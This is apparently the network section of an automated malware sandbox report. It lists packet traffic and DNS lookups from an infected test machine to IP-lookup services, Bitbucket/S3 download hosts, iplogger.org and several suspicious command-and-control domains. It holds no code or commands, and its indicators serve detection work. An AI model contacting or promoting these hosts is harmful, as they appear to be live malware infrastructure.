                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.861891985 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.861896038 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.861903906 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.861910105 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.861916065 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.861922979 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.861933947 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.861955881 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862127066 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862133980 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862217903 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862272024 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862278938 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862289906 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862296104 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862301111 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862308025 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862313032 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862318993 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862323999 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862338066 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862344980 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862355947 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862358093 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862358093 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862358093 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862364054 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862377882 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862384081 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862389088 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862395048 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862397909 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862401009 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862406015 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862420082 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862425089 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862452984 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862478018 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862488985 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862495899 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862508059 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862521887 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862529039 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862540007 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862545967 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862559080 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862565041 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862571955 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862597942 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862597942 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862621069 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862673044 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862679958 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862684965 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862690926 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862696886 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862714052 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862744093 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862744093 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862763882 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862770081 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862776041 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862781048 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862788916 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862795115 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862808943 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862813950 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862822056 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.862869978 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.868644953 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.868729115 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874155045 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874165058 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874178886 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874196053 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874202967 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874208927 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874214888 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874237061 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874253988 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874356985 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874363899 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874376059 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874382019 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874387026 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874392986 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874412060 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874413967 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874418974 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874422073 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874425888 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874435902 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874442101 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874448061 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874458075 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874469042 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874469042 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874479055 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874522924 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874674082 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.874747038 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875195980 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875219107 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875225067 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875231028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875236988 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875273943 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875287056 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875323057 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875330925 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875336885 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875346899 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875354052 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875365973 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875370026 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875406981 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875508070 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875524998 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875540972 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875551939 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875557899 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875569105 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875574112 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875579119 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875585079 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875586033 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875591993 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875597000 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875614882 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875622034 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875627995 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875638962 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875639915 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875639915 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875646114 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875654936 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875659943 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875689030 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875777960 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875785112 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875796080 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875802040 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875808001 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875813961 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875818968 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875823975 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875828981 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875835896 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875835896 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875860929 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.875879049 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:02.067099094 CEST192.168.2.91.1.1.10xf116Standard query (0)api64.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:03.247287035 CEST192.168.2.91.1.1.10x450bStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.252306938 CEST192.168.2.91.1.1.10xfeb3Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.252635956 CEST192.168.2.91.1.1.10x7ae4Standard query (0)nerv.com.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.936475992 CEST192.168.2.91.1.1.10x560Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:31.747805119 CEST192.168.2.91.1.1.10x5491Standard query (0)iplogger.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:39.046701908 CEST192.168.2.91.1.1.10x3229Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:39.229748011 CEST192.168.2.91.1.1.10x7737Standard query (0)tventyvf20pt.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:40.281524897 CEST192.168.2.91.1.1.10x7737Standard query (0)tventyvf20pt.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:36.278307915 CEST192.168.2.991.211.247.2480xebbaStandard query (0)ckmqpoy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:38.721446991 CEST192.168.2.91.1.1.10x2f05Standard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:42.531493902 CEST192.168.2.91.1.1.10x92d1Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:14.231045008 CEST192.168.2.91.1.1.10xa614Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:15.218400955 CEST192.168.2.91.1.1.10xa614Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.218404055 CEST192.168.2.91.1.1.10xa614Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:02.075238943 CEST1.1.1.1192.168.2.90xf116No error (0)api64.ipify.org173.231.16.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:02.075238943 CEST1.1.1.1192.168.2.90xf116No error (0)api64.ipify.org104.237.62.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:03.254807949 CEST1.1.1.1192.168.2.90x450bNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.259063005 CEST1.1.1.1192.168.2.90xfeb3No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.259063005 CEST1.1.1.1192.168.2.90xfeb3No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.259063005 CEST1.1.1.1192.168.2.90xfeb3No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.476810932 CEST1.1.1.1192.168.2.90x7ae4No error (0)nerv.com.pe162.241.61.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)s3-w.us-east-1.amazonaws.com54.231.236.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)s3-w.us-east-1.amazonaws.com16.182.72.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)s3-w.us-east-1.amazonaws.com52.217.131.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)s3-w.us-east-1.amazonaws.com3.5.30.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)s3-w.us-east-1.amazonaws.com54.231.204.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)s3-w.us-east-1.amazonaws.com52.217.83.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)s3-w.us-east-1.amazonaws.com52.217.132.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.966936111 CEST1.1.1.1192.168.2.90x560No error (0)s3-w.us-east-1.amazonaws.com16.182.39.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:31.756347895 CEST1.1.1.1192.168.2.90x5491No error (0)iplogger.org172.67.74.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:31.756347895 CEST1.1.1.1192.168.2.90x5491No error (0)iplogger.org104.26.2.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:31.756347895 CEST1.1.1.1192.168.2.90x5491No error (0)iplogger.org104.26.3.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:39.056900978 CEST1.1.1.1192.168.2.90x3229No error (0)steamcommunity.com23.197.127.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:40.481028080 CEST1.1.1.1192.168.2.90x7737No error (0)tventyvf20pt.top5.53.124.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:40.481049061 CEST1.1.1.1192.168.2.90x7737No error (0)tventyvf20pt.top5.53.124.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:33.744225025 CEST1.1.1.1192.168.2.90x54afName error (3)sentistivowmi.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:36.313438892 CEST91.211.247.248192.168.2.90xebbaNo error (0)ckmqpoy.net185.196.8.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:38.984477043 CEST1.1.1.1192.168.2.90x2f05No error (0)cowod.hopto.org45.132.206.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:42.538557053 CEST1.1.1.1192.168.2.90x92d1No error (0)steamcommunity.com23.197.127.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru189.181.24.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru181.204.98.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru181.28.104.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560040951 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru189.181.24.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru181.204.98.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru181.28.104.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560072899 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru189.181.24.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru181.204.98.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru181.28.104.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
